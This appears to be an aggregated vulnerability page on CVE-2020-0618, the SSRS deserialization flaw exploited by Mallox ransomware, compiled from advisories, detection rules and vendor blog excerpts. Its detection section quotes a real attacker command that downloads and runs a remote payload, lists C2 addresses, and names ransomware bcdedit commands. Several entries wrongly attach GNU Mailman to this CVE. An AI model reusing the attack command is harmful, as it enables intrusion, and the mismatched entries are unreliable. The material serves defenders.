CVE-2020-0618
published 2020-02-11CVE-2020-0618: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server…
PriorityP196high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2024-10-09
Exploited in the wild
EPSS
99.02%
99.9th percentile
A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gnu | mailman | >= 0 < 1:2.1.20-1ubuntu0.4 | 1:2.1.20-1ubuntu0.4 |
| gnu | mailman | >= 0 < 1:2.1.26-1ubuntu0.1 | 1:2.1.26-1ubuntu0.1 |
| microsoft | microsoft_sql_server | — | — |
| microsoft | microsoft_sql_server | — | — |
| microsoft | microsoft_sql_server | — | — |
| microsoft | microsoft_sql_server_2014_service_pack_3_for_32-bit_systems | — | — |
| microsoft | microsoft_sql_server_2014_service_pack_3_for_x64-based_systems | — | — |
| microsoft | microsoft_sql_server_2016_for_x64-based_systems_service_pack_2 | — | — |
| microsoft | sql_server | — | — |
| microsoft | sql_server | — | — |
| microsoft | sql_server | — | — |
| msrc | microsoft_sql_server_2012_for_32-bit_systems_service_pack_4 | — | — |
| msrc | microsoft_sql_server_2012_for_x64-based_systems_service_pack_4 | — | — |
| msrc | microsoft_sql_server_2014_service_pack_3_for_32-bit_systems | — | — |
| msrc | microsoft_sql_server_2014_service_pack_3_for_x64-based_systems | — | — |
| msrc | microsoft_sql_server_2016_for_x64-based_systems_service_pack_2 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcmd.exe /C "echo $cl = New-Object System.Net.WebClient >%APPDATA%\alta.ps1 & echo $cl.DownloadFile("hxxp[:]///scavenger.exe", "%APPDATA%\box.bat") >> %APPDATA%\alta.ps1 & sqlps -ExecutionPolicy Bypass %APPDATA%\alta.ps1 & WMIC process call create "%APPDATA%\box.bat""↗
- →CVE-2020-0618 is exploited via the MS SQL Server Reporting Services (SSRS) page request handler; monitor for anomalous SSRS process spawning child processes (e.g., cmd.exe, powershell.exe) as an indicator of exploitation. ↗
- →Post-exploitation dropper pattern: SQL Server process (sqlservr.exe or sqlps) spawning PowerShell with '-ExecutionPolicy Bypass' writing a script to %TEMP% or %APPDATA%, followed by WMIC process creation — strongly indicative of Mallox initial-stage execution after CVE-2020-0618 exploitation. ↗
- →Detect ransomware defense-evasion via BCD tampering: alert on execution of 'bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures' and 'bcdedit.exe /set {current} recoveryenabled no' from non-administrative maintenance contexts. ↗
- →Hunt for creation of 'updt.ps1' in %TEMP% by SQL Server-related processes; this script is used to download and execute the Mallox ransomware payload. ↗
- →Network detections: block or alert on outbound connections to Mallox C2/distribution IPs 104.21.76.77, 104.237.62.211, 172.67.191.103, 64.185.227.155, 80.66.75.37 and the Tor onion DLS domain. ↗
- ·CVE-2020-0618 affects Microsoft SQL Server Reporting Services (SSRS) versions 2012–2016 only; SQL Server database engine instances without SSRS exposed are not directly vulnerable to this specific CVE. ↗
- ·Mallox actors also use brute-force and dictionary attacks against MS-SQL in addition to CVE-2020-0618 exploitation; patching SSRS alone does not eliminate the Mallox initial-access risk if weak credentials remain. ↗
- ·The download URL pattern in the observed command (hXXp://80[.]66.75.40/...) is partially redacted/defanged in the source; the exact payload path is obfuscated and should not be treated as a static URL IOC. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv5.4MEDIUM
vulncheck8.8HIGH
cisa8.8HIGH
vendor_msrc8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jcvj-vhj2-vgmw: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL
ghsa_unreviewed·2022-05-24
CVE-2020-0618 [MEDIUM] CWE-20 GHSA-jcvj-vhj2-vgmw: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL
A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
OSV
mailman vulnerabilities
osv·2020-04-29·CVSS 5.4
CVE-2018-0618 mailman vulnerabilities
mailman vulnerabilities
It was discovered that Mailman incorrectly handled certain inputs.
An attacker could possibly use this to issue execute arbitrary scripts
or HTML. (CVE-2018-0618)
It was discovered that Mailman incorrectly handled certain inputs.
An attacker could possibly use this issue to display arbitrary text
on a web page. (CVE-2018-13796)
It was discovered that Mailman incorrectly handled certain files.
An attacker could possibly use this issue to execute arbitrary code.
(CVE-2020-12137)
VulnCheck
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
vulncheck·2020·CVSS 8.8
CVE-2020-0618 [HIGH] CWE-502 Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services contains a deserialization vulnerability when handling page requests incorrectly. An authenticated attacker can exploit this vulnerability to execute code in the context of the Report Server service account.
Affected: Microsoft SQL Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-targetcompany; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://redalert.nshc.net/2024/07/26/the-activities-s
CISA
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
cisa·2024-09-18·CVSS 8.8
CVE-2020-0618 [HIGH] CWE-502 Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Vulnerability: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Affected: Microsoft SQL Server
Microsoft SQL Server Reporting Services contains a deserialization vulnerability when handling page requests incorrectly. An authenticated attacker can exploit this vulnerability to execute code in the context of the Report Server service account.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2020-0618 ; https://nvd.nist.gov/vuln/detail/CVE-2020-0618
Remediation Due Date: 2024-10-09
Microsoft
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
vendor_msrc·2020-02-11·CVSS 8.8
CVE-2020-0618 [HIGH] Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability
Description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests. An attacker who successfully exploited this vulnerability could execute code in the context of the Report Server service account.
To exploit the vulnerability, an authenticated attacker would need to submit a specially crafted page request to an affected Reporting Services instance.
The security update addresses the vulnerability by modifying how the Microsoft SQL Server Reporting Services handles page requests.
FAQ: There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?
First, determine your SQL Serve
Suricata
ET EXPLOIT Possible Microsoft SQL RCE Attempt (CVE-2020-0618)
suricata·2020-02-18·CVSS 8.8
CVE-2020-0618 [HIGH] ET EXPLOIT Possible Microsoft SQL RCE Attempt (CVE-2020-0618)
ET EXPLOIT Possible Microsoft SQL RCE Attempt (CVE-2020-0618)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible Microsoft SQL RCE Attempt (CVE-2020-0618)"; flow:established,to_server; urilen:37; http.method; content:"POST"; http.uri; content:"/ReportServer/pages/ReportViewer.aspx"; http.request_body; content:"NavigationCorrector|24|PageState|3d|NeedsCorrection|26|NavigationCorrector|24|ViewState|3d|"; startswith; fast_pattern; content:"|26 5f 5f|VIEWSTATE|3d|"; endswith; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,github.com/euphrat1ca/CVE-2020-0618; classtype:web-application-attack; sid:2029476; rev:3; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_02_18, cve CVE_2020_0618,
Exploit-DB
Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
exploitdb·2020-09-17·CVSS 8.8
CVE-2020-0618 [HIGH] Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
---
# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL
Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
#!/usr/bin/python
from requests.packages.urllib3.exceptions import InsecureRequ
Nuclei
Microsoft SQL Server Reporting Services - Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-0618 [HIGH] Microsoft SQL Server Reporting Services - Remote Code Execution
Microsoft SQL Server Reporting Services - Remote Code Execution
Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.
Template:
id: CVE-2020-0618
info:
name: Microsoft SQL Server Reporting Services - Remote Code Execution
author: joeldeleep
severity: high
description: Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
reference:
- https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-
Metasploit
SQL Server Reporting Services (SSRS) ViewState Deserialization
metasploit
SQL Server Reporting Services (SSRS) ViewState Deserialization
SQL Server Reporting Services (SSRS) ViewState Deserialization
A vulnerability exists within Microsoft's SQL Server Reporting Services which can allow an attacker to craft an HTTP POST request with a serialized object to achieve remote code execution. The vulnerability is due to the fact that the serialized blob is not signed by the server.
Bleepingcomputer
CISA warns of actively exploited Apache HugeGraph-Server bug
blogs_bleepingcomputer·2024-09-19·CVSS 8.8
CVE-2024-27348 [HIGH] CISA warns of actively exploited Apache HugeGraph-Server bug
## CISA warns of actively exploited Apache HugeGraph-Server bug
## Bill Toulas
The U.S. Cybersecurity and Infrastructure Agency (CISA) has added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, among which is a remote code execution (RCE) flaw impacting Apache HugeGraph-Server.
The flaw, tracked as CVE-2024-27348 and rated critical (CVSS v3.1 score: 9.8), is an improper access control vulnerability that impacts HugeGraph-Server versions from 1.0.0 and up to, but not including 1.3.0.
Apache fixed the vulnerability on April 22, 2024, with the release of version 1.3.0. Apart from upgrading to the latest version, users were also recommended to use Java 11 and enable the Auth system .
Also, enabling the "Whitelist-IP/port" function was proposed to improve the security of th
Securelist
Mallox ransomware: in-depth analysis and evolution
blogs_securelist·2024-09-04
Mallox ransomware: in-depth analysis and evolution
Table of Contents
Background
Timeline
RaaS promotion
Statistics on the RaaS affiliates
Typical infection scenario
Analysis
Earliest known Mallox version (9b772efb921de8f172f21125dd0e0ff7, v1)
Preparing for encryption
Drives enumeration and exclusions
Cryptography
Communication with the attackers’ C&C server
Recent Mallox version (e98b3a8d2179e0bd0bebba42735d11b7, v12)
New arguments
Preparing for encryption
Cryptography
Communication with the attackers’ C&C server
Timeline of Mallox versions
Cryptographic scheme in v5 and above: the “generated key” variant
Cryptographic scheme in v6 and above: the “embedded key” variant
Negotiation portal and DLS (data leak site)
Victims
Conclusions
IoC
Authors
Fedor Sinitsyn
Yanis Zinchenko
Mallox is a sophisticated and dangerous
Securelist
Evolution of Mallox: from private ransomware to RaaS
blogs_securelist·2024-09-04
Evolution of Mallox: from private ransomware to RaaS
Table of Contents
- Background
- Typical infection scenario
- Analysis
- Negotiation portal and DLS (data leak site)
- Victims
- Conclusions
- IoC
Authors
- Fedor Sinitsyn
- Yanis Zinchenko
Mallox is a sophisticated and dangerous family of malicious software that has been causing significant damage to organizations worldwide. In 2023, this ransomware strain demonstrated an uptick in attacks, the overall number of discovered Mallox samples exceeding 700. In the first half of 2024, the malware was still being actively developed, with new versions being released several times a month, while the Mallox RaaS affiliate program advertised on dark web forums was seeking new partners. This article aims to provide a comprehensive technical overview of the ransomware and its history.
## Backgro
Sentinelone
Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises
blogs_sentinelone·2023-12-13·CVSS 8.8
[HIGH] Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises
The ransomware landscape is characterized by a heavy churn in both actor groups and malware families, with only a few players exhibiting relative longevity. Once feared threats such as REvil and Conti have either been dismantled or dissolved, while others – ALPHV , Black Basta and LockBit , for example – continue to extort businesses with impunity. To this second list we can also add Mallox ( aka TargetCompany), a lesser-known but long-running ransomware threat first seen in 2021. Today, the group continues to steal and leak a steady stream of enterprise data.
In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.
Sentinelone
Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises
blogs_sentinelone·2023-12-13·CVSS 8.8
[HIGH] Mallox Resurrected | Ransomware Attacks Exploiting MS-SQL Continue to Burden Enterprises
The ransomware landscape is characterized by a heavy churn in both actor groups and malware families, with only a few players exhibiting relative longevity. Once feared threats such as REvil and Conti have either been dismantled or dissolved, while others – ALPHV, Black Basta and LockBit, for example – continue to extort businesses with impunity. To this second list we can also add Mallox (aka TargetCompany), a lesser-known but long-running ransomware threat first seen in 2021. Today, the group continues to steal and leak a steady stream of enterprise data.
In this post, we highlight recent Mallox activity, explain the group’s initial access methods and provide a high-level analysis of recent Mallox payloads to help defenders better understand and defend against this persistent threat.
#
Trendmicro
TargetCompany unter der Lupe
blogs_trendmicro·2023-06-28
TargetCompany unter der Lupe
Ransomware
## TargetCompany unter der Lupe
TargetCompany ist eine Ransomware-Familie mit vielen verschiedenen Erscheinungsformen, die sich in der Bedrohungslandschaft etabliert hat. Deshalb ist die Kenntnis der Einzelheiten dieser schillernden Malware für den Schutz davor wichtig.
By: Trend Micro Jun 28, 2023 Read time: ( words)
Save to Folio
Die Ransomware TargetCompany wurde im Juni 2021 entdeckt und von Branchenanalysten nach dem Muster benannt, nach dem die verschlüsselten Dateien an den Namen des Zielunternehmens angehängt werden. In einem Interview im Januar 2023 stellten die Bedrohungsakteure hinter TargetCompany klar, dass jedes größere Update der Ransomware eine Änderung des Verschlüsselungsalgorithmus und verschiedene Entschlüsselungsmerkmale mit sich bringt. Diese gehen mit
Tenable
Database One-Stop-Shop
blogs_tenable·2021-06-03
Database One-Stop-Shop
by Josef Weiss June 3, 2021
A benefit of an effective database security program is that organizations are better positioned to safeguard against the risks of compromise, and to thwart attacks such as malware and ransomware. Steps to building such a program include following best practices and regulatory requirements. Key initiatives include conducting and reviewing vulnerability assessments, and compliance audits.
Databases typically contain sensitive material such as financial data, personnel information, business intelligence, client information, and more. Organizational secrets were once contained in a locked file cabinet, within secure rooms, or entombed deep within an organization. Access was controlled with a key requiring on-site access, and copying or removing files was difficult
Tenable
CVE-2020-0618: Proof of Concept for Microsoft SQL Server Reporting Services Vulnerability Available
blogs_tenable·2020-02-19·CVSS 8.8
[HIGH] CVE-2020-0618: Proof of Concept for Microsoft SQL Server Reporting Services Vulnerability Available
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-02-11·CVSS 8.8
[HIGH] Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity.
This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.
Talos released a new set of SNORTⓇ rules today that provide coverage for some of these vulnerabilities, which you can see here.
### Critical vulnerabilities Microsoft disclosed 12 critical vulnerabilities this mo
Talos
Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-02-11·CVSS 7.5
[HIGH] Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — Feb. 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 98 vulnerabilities, 12 of which are considered critical and 84 that are considered important. There are also two bugs that were not assigned a severity.
This month's patches include updates to the Windows kernel, the Windows scripting engine and Remote Desktop Procol, among other software and features. Microsoft also provided a critical advisory covering updates to Adobe Flash Player.
Talos released a new set of SNORTⓇ rules today that provide coverage for some of these vulnerabilities, which you can see here
Krebs
Microsoft Patch Tuesday, February 2020 Edition
blogs_krebs·2020-02-11·CVSS 7.8
[HIGH] Microsoft Patch Tuesday, February 2020 Edition
Microsoft today released updates to plug nearly 100 security holes in various versions of its Windows operating system and related software, including a zero-day vulnerability in Internet Explorer (IE) that is actively being exploited. Also, Adobe has issued a bevy of security updates for its various products, including Flash Player and Adobe Reader/Acrobat.
Last month, Microsoft released an advisory warning that attackers were exploiting a previously unknown flaw in IE. That vulnerability, assigned as CVE-2020-0674, has been patched with this month’s release. It could be used to install malware just by getting a user to browse to a malicious or hacked Web site.
Microsoft once again fixed a critical flaw in the way Windows handles shortcut (.lnk) files (CVE-2020-0729) that affects Window
Krebs
Microsoft Patch Tuesday, February 2020 Edition
blogs_krebs·2020-02-11·CVSS 7.8
[HIGH] Microsoft Patch Tuesday, February 2020 Edition
Microsoft today released updates to plug nearly 100 security holes in various versions of its Windows operating system and related software, including a zero-day vulnerability in Internet Explorer (IE) that is actively being exploited. Also, Adobe has issued a bevy of security updates for its various products, including Flash Player and Adobe Reader/Acrobat .
A dozen of the vulnerabilities Microsoft patched today are rated “critical,” meaning malware or miscreants could exploit them remotely to gain complete control over an affected system with little to no help from the user.
Last month, Microsoft released an advisory warning that attackers were exploiting a previously unknown flaw in IE. That vulnerability, assigned as CVE-2020-0674 , has been patched with this month’s release. It coul
http://packetstormsecurity.com/files/156707/SQL-Server-Reporting-Services-SSRS-ViewState-Deserialization.htmlhttp://packetstormsecurity.com/files/159216/Microsoft-SQL-Server-Reporting-Services-2016-Remote-Code-Execution.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618http://packetstormsecurity.com/files/156707/SQL-Server-Reporting-Services-SSRS-ViewState-Deserialization.htmlhttp://packetstormsecurity.com/files/159216/Microsoft-SQL-Server-Reporting-Services-2016-Remote-Code-Execution.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-0618
2020-02-11
Published
2024-09-18
Added to CISA KEV
Exploited in the wild